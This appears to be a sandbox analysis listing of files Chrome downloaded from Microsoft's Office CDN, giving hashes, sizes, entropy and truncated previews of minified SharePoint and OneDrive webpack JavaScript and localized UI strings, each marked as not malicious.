                              Encrypted:false
                              SSDEEP:
                              MD5:BA53F2F95E10E210B0E7A6DF71715F08
                              SHA1:D4F0CD4C7CD8325D29771C6586685809047A0809
                              SHA-256:F39A1586D71D5FA9C1F7149067260DAFBF66F1C8BD50DA0B87B0867F341D40A6
                              SHA-512:881B4D5A3CC6BA8E720E937FE03609B63D2506C8953EB4ABE3F7ED3D85E8312D56C4EF4F4267E6D3680A08EC3813D1BB8AB1315B0684CA1B9780CD9EB1954ADA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/51.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[51],{1617:(e,t,n)=>{n.d(t,{a:()=>s,b:()=>o});var a=n(47),i=n(816),r=n(51);function o(e,t){var n,r=(0,a.a)("ExternalService_powerbihostname");if((0,a.b)(i.f)&&(r="daily.powerbi.com"),!r)return"";var o=e.webAbsoluteUrl+(e.webServerRelativeUrl.length>1?null===(n=e.listUrl)||void 0===n?void 0:n.substring(e.webServerRelativeUrl.length):e.listUrl);return o=encodeURIComponent(o),(t?"http://".concat(r,"/sharepointlist/groups/").concat(t.groupId,"/reports/").concat(t.reportId):"http://".concat(r,"/sharepointlist")).concat("?spListId=".concat(e.listId,"&spListUrl=").concat(o,"&spListUniqueId=").concat(s(e),"&culture=").concat(e.currentUICultureName))}function s(e){var t=e.siteId,n=e.listId;return r.a.normalizeLower(t,!1)+r.a.normalizeLower(n,!1)}}.,816:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>p,c:()=>u,d:()=>m,e:()=>s,f:()=>d,g:()=>l,h:()=>f,i:()=>i.b});var a=n("odsp.util_578"),i=n(47),r=window._spPageContextInfo,o=(function(){v
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3544)
                              Category:downloaded
                              Size (bytes):8022
                              Entropy (8bit):5.065259400122105
                              Encrypted:false
                              SSDEEP:
                              MD5:31B2CBA58DDF580912E735703B88DA39
                              SHA1:1A6CA8684B4914C34FBD4CD5623592CD08C6A9A3
                              SHA-256:BABA8B157364C6C78F2E466FB89BED51B45F340B73D59DD5DF49BED7C0C164EA
                              SHA-512:CBE04FA94099799F6BAF640A4D78D42BA96C5DE672173A862F0A2E0FE54C2289688897396283655EA747A393866B3E1E4262A6632CAED1E49E25BA22C9844C86
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/2.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[2],{6158:function(e,t,n){n(952);var a=n("odsp.util_578"),i=n("knockout-lib"),r=function(){function e(e,t){var n=this;this._source=e,this._getKey=t,this._groupsByKeyId={},this.groups=i.observableArray(),this._initializeGroups(),(0,a.AJ)(this.groups,function(){n._mapping.dispose()})}return e.group=function(t,n){return new e(t,n).groups},e.prototype._initializeGroups=function(){var e=this;this._mapping=this._source.map({mappingWithDisposeCallback:function(t){var n=e._getKey(t),a=JSON.stringify(n),r=e._groupsByKeyId[a];return r?r.values.push(t):(r={key:n,values:i.observableArray([t])},e._groupsByKeyId[a]=r,e.groups.push(r)),{mappedValue:a,dispose:function(){r.values.peek().length>1?r.values.remove(t):(delete e._groupsByKeyId[a],e.groups.remove(r))}}}})},e}();t.a=r}.,3718:function(e,t,n){n.d(t,{a:function(){return p}});var a=n("tslib_102"),i=n(924),r=n(925),o=n(3283),s=n(23),c=n(2088),d=n("knockout-lib");function
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (59290)
                              Category:downloaded
                              Size (bytes):556973
                              Entropy (8bit):5.515783233419507
                              Encrypted:false
                              SSDEEP:
                              MD5:78BC5772B03B1D59437D334231CD2FCD
                              SHA1:341AE8489DA43D175B959071EDDDC80D2BDCD41A
                              SHA-256:4B84C1E72A98103289E2EBFC7B39226C4EFC4CE9AF16C5DF3F53772669C519A3
                              SHA-512:8A92BDC211E7F4DCA6DAFAFE197AE858A4E544931AD1CE29D96495586C71E0E05A522BD46400F33EB740DD07A8BA37FA8748CD9383D4ACA6B4852807661BBCFB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.components/fui.co-35559c76.js
                              Preview:/*! For license information please see fui.co-35559c76.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.co"],{"fui.co_13":e=>{var t=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,a=Object.prototype.propertyIsEnumerable;function i(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},n=0;n<10;n++)t["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(t).map(function(e){return t[e]}).join(""))return!1;var a={};return"abcdefghijklmnopqrst".split("").forEach(function(e){a[e]=e}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},a)).join("")}catch(e){return!1}}()?Object.assign:function(e,r){for(var o,s,c=i(e),d=1;d<arguments.length;d++){for(var l in o=Object(arguments[d]))n.call(o,l)&&(c[l]=o[l]);i
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3211)
                              Category:downloaded
                              Size (bytes):3589
                              Entropy (8bit):5.327059703339192
                              Encrypted:false
                              SSDEEP:
                              MD5:056EF5FB76F022201AA84A4A7DEB68AE
                              SHA1:9A2001E460BAAF5D83E657EAB4817D5EEC06AC4F
                              SHA-256:B7A140357A43524F6FF78731CB92EECFE906A591DF1EC72ECF7A56B6317877FA
                              SHA-512:361E08EDC3C624BD14CEFFBA3863EDE32D3585EF8548BB880F67AC3D3DB0C3B0D09849223BEBB45120ED09F059B1A6FF99C771FE0A898311D8E405DAC3029D23
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/590.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[590],{2313:function(e,t,n){n.d(t,{a:function(){return a}});var a={Owner:0,View:1,Edit:2,Submitter:3,CoOwner:4,None:5,Review:6,Custom:7}}.,4980:function(e,t,n){n.r(t),n.d(t,{OpenInImageEditorHandler:function(){return x}});var a=n("tslib_102"),i=n(143),r=n(2211),o=n(2088),s=n(23),c=n(1032),d=n(97),l=n(2100),u=n(2143),f=n(199),p=n(129),m=n(122),_=n(3045),h=n(2285),b=n(69),g=n(475),v=n(2474),y={jpg:"image/jpg",jpeg:"image/jpeg"},S={png:"image/png"},D={heic:"image/heic",heif:"image/heif"},I={bmp:"image/bmp",emf:"image/emf",gif:"image/gif",tiff:"image/tiff",tif:"image/tif",webp:"image/webp",wmf:"image/wmf"},x=function(e){function t(t){void 0===t&&(t={});var n=e.call(this,t)||this;return n._itemSelectionHelper=new(n.child(l.a))({allowMultiSelect:!1,canFallback:!0}),n._isOneDriveWinApp=(0,p.a)(),n._urlDataSource=n.resources.consume(d.bb),n._itemCommandHelper=n.resources.consume(u.b),n._platformDetection=n.resources.c
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (28428)
                              Category:downloaded
                              Size (bytes):31405
                              Entropy (8bit):5.319589052151865
                              Encrypted:false
                              SSDEEP:
                              MD5:B46EA03AC9A215FEB182BF57477CDD0C
                              SHA1:7D63540BB7854F3054E949133A4769DE87FC829D
                              SHA-256:F6364A61FA829D7EAD81954F59FAB445BF094FFA6FFF96AE4E89C3BCE5407344
                              SHA-512:265CF1A152962FCA374111973921AC4BDFA604C884977F68A72A83EBE78F4FB50BACBD48FF69D364E5862BD96B1BAD353BB42412FF5D213104AA12E0FF9E51DD
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/23.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[23],{6275:(e,t,n)=>{n.d(t,{a:()=>F,b:()=>H});var a=n("tslib_102"),i=n(832),r=n(5481),o=n(5482),s=n(5749),c=n(935),d=n(1915),l=n(1044),u=n(1164),f=n(1045),p=n(773),m=n(943),_=n(1165),h=n(1322),b=n(828),g=n(3412),v=n(5496),y=n(1555),S=n(5427),D=n(5300),I=n(402),x=n("odsp.util_578"),C=n(5959),O=n(942),w=n(5722),E=n(831),A=!x.HW.isActivated("48d0bf6b-2e41-42a8-a3a3-e8d2ef405dbb","7/14/2022","better error handling"),L=x.HW.isActivated("3e85cd31-2807-44c1-96bf-35f08619ec11","1/31/2023","Fix for not appending navId to SPL link"),k=x.HW.isActivated("46a06a91-966f-47f1-af68-09d8b3864e12","07/03/2023","Override navId with navIdSendLinkOverride")||x.IT.isFeatureEnabled({ECS:1107386}),M=x.HW.isActivated("62a4337e-d21e-407b-b2ef-2163777d20b8","12/19/2022","Link unfurl using displayName KS")||x.IT.isFeatureEnabled({ECS:1059927}),P=x.HW.isActivated("9c1ecbd5-cae0-484e-ba86-18863f653357","09/18/2023","KS for using AgeGroup r
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1715)
                              Category:downloaded
                              Size (bytes):3540
                              Entropy (8bit):5.153100319385347
                              Encrypted:false
                              SSDEEP:
                              MD5:76062387950D07C076DF0EF1EE5F9952
                              SHA1:0BEB7FD6210D343F0AD4F0A89A3AFE77D2816DDA
                              SHA-256:76D31012E092F0AF5EE2E570BCB2BB0FEC34F5C17AB508475FA9F94AE1113414
                              SHA-512:9DDBBBBEC881B6EDA7E7B4777F7C15199F3349D9FE3F8CD0FD2810B47542ADB0914A953A8C7ABEEDBEF4966289C113F6090808052B883D17943C71DE8F136045
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/537.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[537],{2205:function(e,t,n){n.d(t,{b:function(){return d}});var a=n("tslib_102"),i=n(23),r=n("odsp.util_578"),o=n(2088),s=n(242),c=function(e){function t(t,n){void 0===n&&(n={});var a=e.call(this,t,n)||this;return a._getModule=t.getModule,a._path=t.path,a._getExecutorParams=t.getExecutorParams,r.HW.isActivated("9DB5106C-820A-4714-B0C1-1005523DFE8F","07/09/2021","Removes usage of BundeLoader from ExecutorAction to solve race conditions in BundleQueue")&&(a._bundleLoader=a.resources.consume(s.a),a._bundleLoader.queueLoad(a._path,a._getModule).done()),a}return(0,a.XJ)(t,e),t.prototype.execute=function(e,t){var n=this;return this._path?this._loadExecutorType().then(function(a){return"function"!=typeof a?i.c.wrapError(new Error("Cannot create action from ".concat(a,": ").concat(n._path))):i.c.as(n._getExecutorParams()).then(function(r){var o=new(n.resources.injected(a))(r);return i.c.as(o.execute(e,t))})}):i.c.wrap
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (12888)
                              Category:downloaded
                              Size (bytes):2474959
                              Entropy (8bit):5.414101496724499
                              Encrypted:false
                              SSDEEP:
                              MD5:9818BB5E58C35D67EBD3ADCF66143ED7
                              SHA1:1056A9AFB1C09499F1C7AFFE1F6DB008864371B9
                              SHA-256:3E33FD016C1769EBAA821537C83C858A88DAB6D0E75862E7652AD3E187DFDADE
                              SHA-512:4BF9E930E77C5B25879D0F56E937B2DD2F788764B125509EC6D4DFDAB2C2009B9945EA8C23067E96A61E1D54949A74E34854A08C43AECEAE6050FA70CB8B744A
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/odblightspeedwebpack.js
                              Preview:/*! For license information please see odblightspeedwebpack.js.LICENSE.txt */.var __webpack_result__;(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odblightspeedwebpack"],[function(e,t,n){"use strict";n.d(t,{a:function(){return r},b:function(){return c},c:function(){return s},d:function(){return o}});var a=n(13),i=new Map,r=function(){function e(e){this.debugName=e;var t=this.id=(0,a.a)(e);i.set(t,this)}return e.get=function(e){if(!e)throw new Error("Unable to determine the Facet for an empty or undefined id.");var t=i.get(e);if(!t)throw new Error("Unable to determine the Facet for id '".concat(e,"'. ")+"Only store objects into a facet collection that have been created using the pack function. This error will typically occur if multiple versions of the @ms/items-view package have been bundled into the application.");return t},e.prototype.unpack=function(e){var t=JSON.stringify(this.id);return this.unpack=new Function("t","return t[".concat(t,"]")),this.unpack(e)},e.p
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (2613)
                              Category:downloaded
                              Size (bytes):11972
                              Entropy (8bit):5.182102442264609
                              Encrypted:false
                              SSDEEP:
                              MD5:8CB3A638EE6C774D3EF1D23D2718032F
                              SHA1:7C2AE37C71BF24DA85515A7C9AA02D00A0B7FB82
                              SHA-256:7108D221C2715FD84FD38D5C880815A50ADF92629802DC6B7BA8413BAACB50BE
                              SHA-512:5F2E85237D8F4C4551CEE6F11EB0DD99306E7C062A0860A9D7812186E77CF3A0286FF18113F299979C8ED59BF8F0E87F48B25FA189DB4C25B0681F3A74BAEA24
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/en-gb/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{534:e=>{e.exports=JSON.parse('{"a":"Something went wrong","c":"Try refreshing the page","b":"Something went wrong and we couldn\\u0027t get the page to display."}')}.,297:e=>{e.exports=JSON.parse('{"b":"Only available when online","a":"{0}. Disabled while offline"}')}.,536:e=>{e.exports=JSON.parse('{"a":"Correlation ID: {0}","b":"Internet disconnected"}')}.,468:e=>{e.exports=JSON.parse('{"NONE":"None","SUM":"Sum","COUNT":"Count","AVG":"Average","MAX":"Maximum","MIN":"Minimum","STDEV":"Std Deviation","VAR":"Variance"}')}.,466:e=>{e.exports=JSON.parse('{"b":"Yes","a":"No"}')}.,277:e=>{e.exports=JSON.parse('{"a":"Files that need attention","b":"Items that need attention","h":"Pages that need attention","g":"Missing info","d":"{0} field missing||{0} fields missing","c":"1||2-","e":"{0} missing","f":"Required info"}')}.,554:e=>{e.exports=JSON.parse('{"a":"Provide feedback to Microsoft"}')}.,462:e=
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (876)
                              Category:downloaded
                              Size (bytes):1202
                              Entropy (8bit):5.062970092259936
                              Encrypted:false
                              SSDEEP:
                              MD5:2A18539D2F64966D234C09B51D179433
                              SHA1:62C3A98F12924AC7818F98CBA0BA51724D96391A
                              SHA-256:DFE03B62ADA6CC0DBF2E23015FE9AA46C34A085592DDFA0694BB8D0A2650B048
                              SHA-512:82E5A75056AD4EFDFF419AB514D6970126D35DB5F486302D1A114A96AB41C6FF023CD1681613599BA270BE67F0B14377C57D2936FA0A8CDF9C777D49FC45F4F5
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/fr/deferred.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["deferred.resx"],{393:e=>{e.exports=JSON.parse('{"a":"Envoyer des commentaires . Microsoft"}')}.,315:e=>{e.exports=JSON.parse('{"a":"Mes fichiers"}')}.,386:e=>{e.exports=JSON.parse('{"a":"Param.tres de la biblioth.que"}')}.,387:e=>{e.exports=JSON.parse('{"a":"Ajouter une application","b":"Centre de la marque (pr.version)","c":"Centre de la marque","d":"Modifier l.apparence","j":"Param.tres de la biblioth.que","k":"Param.tres de la liste","r":"Utilisation du site","s":"Contenu du site","w":"Param.tres du site","u":"Autorisations de site","t":"Informations sur le site","i":"Param.tres du site hub","m":"Corbeille","p":"Nouveaut.s","q":"Se d.connecter","h":"Aide","v":"Conceptions de site","f":"Navigation globale","x":"Appliquer un mod.le de site","l":"Param.tres de votre espace OneDrive","o":"Restaurer votre espace OneDrive","g":"Se connecter au nouveau groupe Microsoft.365","n":"Restaurer cette b
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (65461)
                              Category:downloaded
                              Size (bytes):177542
                              Entropy (8bit):5.477418269290358
                              Encrypted:false
                              SSDEEP:
                              MD5:7E67A85CF26D0EF120F3059FD0C7BB42
                              SHA1:89EFC766BD466FA0C14191F4E014EB8E7F551978
                              SHA-256:B231B130B685DFEB6A5AE87361E0DAC30492A65A940E1CBF048BBFBAA3270D67
                              SHA-512:9405F001BF4151DCB0B3B1C7130EB06F5681AC42206FE30DF289657E07CCA9C7F00631848AB4F8BA3EDF84928240775141965DF37FDE5D8106CC012E6FCEE0A3
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.core/fui.core-82c23c88.js
                              Preview:/*! For license information please see fui.core-82c23c88.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.core"],{"fui.core_238":(e,t,n)=>{n.d(t,{Zc3:()=>_s,M8_:()=>ds,XQB:()=>Ds,ZuL:()=>nr,$i4:()=>hi,KrZ:()=>er,fbr:()=>sr,z2B:()=>us,QZm:()=>tr,H3D:()=>_i,Bs0:()=>gs,F3:()=>mi,uJ1:()=>p,AQp:()=>oi,z2u:()=>Mr,Zlt:()=>Pr,xgv:()=>Ss,WmU:()=>Is,c01:()=>it,WxX:()=>$e,zLI:()=>ar,r6K:()=>f,Bfw:()=>u,uTr:()=>l,ovW:()=>ms,iJB:()=>k,mRq:()=>L,Egq:()=>Lr,YW9:()=>kr,knY:()=>yr,rVc:()=>Sr,JV$:()=>ys,Xf7:()=>we,plP:()=>Ai,OIM:()=>Ai,e9c:()=>xs,aMF:()=>dr,kml:()=>lr,tcZ:()=>ps,TNG:()=>ss,NE4:()=>os,Oed:()=>vs,imO:()=>fs,sDT:()=>Wi,sIX:()=>Oo,u$q:()=>zi,QZw:()=>ir,gHV:()=>ls,g$Y:()=>mo,P38:()=>rr,GfW:()=>or,RWE:()=>cr,X$8:()=>st,_9Q:()=>ot,CcR:()=>bs,KBT:()=>D,k1S:()=>S,_hP:()=>y,gKr:()=>I,VOd:()=>x,X82:()=>h,KrN:()=>_,mpj:()=>m,OKK:()=>C,EJg:()=>b,PSQ:()=>g,V1H:()=>v,CTe:()=>Me,xYP:()=>Pe,QVF:()=>Ei,IsA:()=>bo,q8P:()=>Yi,Ae0:()=>ur,RNv:()=>hs,BNv:()=
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (6039)
                              Category:downloaded
                              Size (bytes):17102
                              Entropy (8bit):5.339309217273593
                              Encrypted:false
                              SSDEEP:
                              MD5:CD874B657D24946D41EBA76C2012B6D3
                              SHA1:59C7BCFFEB44C3678732BA6B4B50BB7004AC5FD7
                              SHA-256:B57D388736F38D97E65FB5C7D20877B21D7E78A1650475DDCD7524090FD8EF3E
                              SHA-512:4C1FBC6DEACDDC7381D123FAE4590943FD0241C422AC679F1B99D444C3CD35CDDB42A31A355490C364E875EC4967F3BBF68DED5F142EFB061755482B280BC3D3
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1054.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1054],{4550:function(e,t,n){n.d(t,{a:function(){return p},b:function(){return _},c:function(){return m},d:function(){return h}});var a,i,r=n("tslib_102");!function(e){e[e.ContextMenu=0]="ContextMenu",e[e.RibbonDocuments=1]="RibbonDocuments",e[e.RibbonList=2]="RibbonList"}(a||(a={})),function(e){e[e.None=0]="None",e[e.List=1]="List",e[e.ContentType=2]="ContentType",e[e.ProgId=3]="ProgId",e[e.FileType=4]="FileType"}(i||(i={}));var o="ClientSideExtension.ListViewCommandSet",s=n(47),c=n(210),d=n(4551),l=n(92),u=n("odsp.util_578"),f=n(150);function p(e){var t=e;return e.RegistrationType&&"string"==typeof e.RegistrationType&&(t.RegistrationType=i[e.RegistrationType]),t}function m(e,t){var n=[],a=[],s=[];if("undefined"==typeof DOMParser)throw new Error("Cannot parse custom actions on this platform");for(var d=new DOMParser,f=function(e){var f=e.Location,p=e.RegistrationType;if(f&&0===f.lastIndexOf(o,0)){if(!p||p!==i
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (11289)
                              Category:downloaded
                              Size (bytes):541593
                              Entropy (8bit):5.035876858113005
                              Encrypted:false
                              SSDEEP:
                              MD5:6B98CA6B9E9629F6B09CE4936E7BEDF6
                              SHA1:835471FA4EC096DA794F44BCD245BBE84D57071E
                              SHA-256:AF3A95CCEFC55480A7E627268B4DBCB0CF1C355905D66A2F47F880D693C4A913
                              SHA-512:52ECE68DF957400E1707EE4C156E1DC447DD013DC6ACD70649B17CEDC5EF0E0229FA1C34DC0DB53694D29BCCAF766FB38AF741588038205CAD8BF4797FFF8AC0
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/en-us/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{5223:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,5968:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (18799)
                              Category:downloaded
                              Size (bytes):60260
                              Entropy (8bit):5.0527559094669545
                              Encrypted:false
                              SSDEEP:
                              MD5:713AB320E57D16DDC8CC5F371C2F219E
                              SHA1:30B294D9A832E1E12DA0E7948051B2DA696D3DE7
                              SHA-256:6EE350DCBCEB6B74BA18A6563F1E9F810830A8FA2AEFE3B542E80DE91445867A
                              SHA-512:94FE3E6E7B28DF39B63B96E5F6A8EF1DAA6F0CD300DC2A023775AF032A67073E1D0CC5B6396A1B465114DB0D8D8EFA28E911C7401F2321C2B72D9DC23D85A806
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/en-gb/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{788:e=>{e.exports=JSON.parse('{"a":"Something went wrong","c":"Try refreshing the page","b":"Something went wrong and we couldn\\u0027t get the page to display."}')}.,1640:e=>{e.exports=JSON.parse('{"a":"Open in Immersive Reader"}')}.,277:e=>{e.exports=JSON.parse('{"b":"Add shortcut to My files","d":"Add shortcut to OneDrive","n":"Remove","p":"Remove shortcut from My files","y":"Remove from shared list","a":"Add a shortcut to this folder in My files","o":"Remove the shortcut to this folder from My files","c":"Add a shortcut to this folder in OneDrive","m":"Remove the selected shortcut from this location","f":"Add shortcut to Albums","e":"Add a shortcut to this shared album in albums","k":"Open file location","t":"Date","s":"Any date","u":"Last 24 hours","w":"Last week","v":"Last month","x":"Last year","l":"Photos","r":"Type","g":"Any Type","i":"Folders","h":"Documents","j":"Music","q":"PC Syn
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2249)
                              Category:downloaded
                              Size (bytes):5274
                              Entropy (8bit):5.313804704705826
                              Encrypted:false
                              SSDEEP:
                              MD5:C3D930FFF147046CC1F6D5F013A08CE6
                              SHA1:D975CDA192F3145256DFFA5F1D9BE6E753E61C89
                              SHA-256:ACA5304EFC282F05B406A260FDCD058825936EDFACFF90125C0AFEB34AF591F2
                              SHA-512:C42631BD3E91133334D9C8ECDD5A2CA7567E222C467921CB1A9C8F504BD97F7D670EDD24BF7D3CD8D13E362C567D6AB0D94E86E256316EA37227F077CD52BB9C
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/172.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[172],{819:(e,t,n)=>{n.d(t,{a:()=>l});var a=n("react-dom-lib"),i=n("tslib_102"),r=n("react-lib"),o=n("fui.lcoms_307"),s=n(21),c=n("odsp.util_578");function d(){return!c.HW.isActivated("4BDEE9AA-40BA-4E0B-905B-33362718986A")&&(0,s.P)({ODB:61241})}var l,u=function(e){var t=e.children,n=r.useMemo(d,[]);return r.createElement(o._z.Provider,{value:n},t)};l=c.HW.isActivated("26DDB843-862A-4916-A636-1BCE47633238")?a.render:function(){for(var e=[],t=0;t<arguments.length;t++)e[t]=arguments[t];var n=e[0],a=e.slice(1);return o.bCK.apply(void 0,(0,i.AE)([r.createElement(u,null,n)],a,!1))}}.,626:(e,t,n)=>{n.r(t),n.d(t,{ReactBridge:()=>S,asPreact:()=>D});var a=n("react-lib"),i=n(1),r=n(0),o=n(121),s=n(157),c=n("tslib_102"),d=n("react-dom-lib"),l=n("fui.util_150"),u=n(557),f=0,p=(0,l.bQ)(function(e){return"".concat(++f)}),m=n(819),_=(0,i.c)({render:function(e,t){(0,m.a)(e,t)},unmount:d.unmountComponentAtNode}),h="AsReactChil
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (11744)
                              Category:downloaded
                              Size (bytes):17972
                              Entropy (8bit):5.363444886234179
                              Encrypted:false
                              SSDEEP:
                              MD5:FBC93ED436AECF24BF920D2C1920C8F5
                              SHA1:3667D5AF26330018289EDC2E0A97BE416AA7B3A2
                              SHA-256:5C6B794E40EED124F5A23AAF772D14AB631D87930DE5B0C5AEAA1CF7ABCDF550
                              SHA-512:C2E13D89EC7B52ACEACFB490AEF1414997DA9E856CC39D9987CDB26C0F357589D3B80655393E407B7388880227DDB38FC7EAD66DF1DA28E4E0DAA71B5BB74199
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/17840.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[17840],{714776:(e,t,n)=>{n.d(t,{Yk:()=>s,hD:()=>o,hN:()=>d,oC:()=>c,r6:()=>r,y$:()=>l});var a,i=n(211111),r=function(e){return(0,i.Z)({accordionContainer:{marginTop:10},debugCommandBar:{paddingLeft:8,borderBottomStyle:"solid",borderBottomWidth:1,borderBottomColor:e?e.palette.neutralSecondaryAlt:""},debugCommandBarItem:{padding:8,paddingTop:14,paddingBottom:14},debugCommandBarIcon:{margin:"0px 4px",lineHeight:"16px",textAlign:"center",flexShrink:"0",fontSize:"20px",color:e?e.palette.themePrimary:""},debugMessageBar:{width:"auto"},scrollableContent:{overflowX:"hidden",overflowY:"auto",paddingLeft:16,paddingRight:16,paddingBottom:16},descriptiveText:{paddingTop:16,color:e?e.palette.neutralSecondaryAlt:""},developerTools:{paddingTop:16},title:{marginTop:5,marginBottom:5},toggle:{marginBottom:0},toggleSubtitleIcon:{paddingRight:4,fontSize:12},toggleSubtitle:{fontWeight:"normal",marginTop:-4,color
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (20306)
                              Category:downloaded
                              Size (bytes):28914
                              Entropy (8bit):5.2791447039386705
                              Encrypted:false
                              SSDEEP:
                              MD5:5BDFB989BF0E3B042EAE0B6771CA02F0
                              SHA1:156CE6C36CB635A1741AD9AD59A48E947168725C
                              SHA-256:EFEE2A1C763B7D1E66F0974DD3A1EF6F7639F8D4700595CE094E745AC8669DCF
                              SHA-512:9D8A1DFFD6ABB10C8277DF98CE79B786415AA46BEE092C9FCA30533E8C2C6991D9C19A4E5E6379275CCFB505E8ACB1A118740AEE45D23F506D5AD2E1532944A5
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/19.js
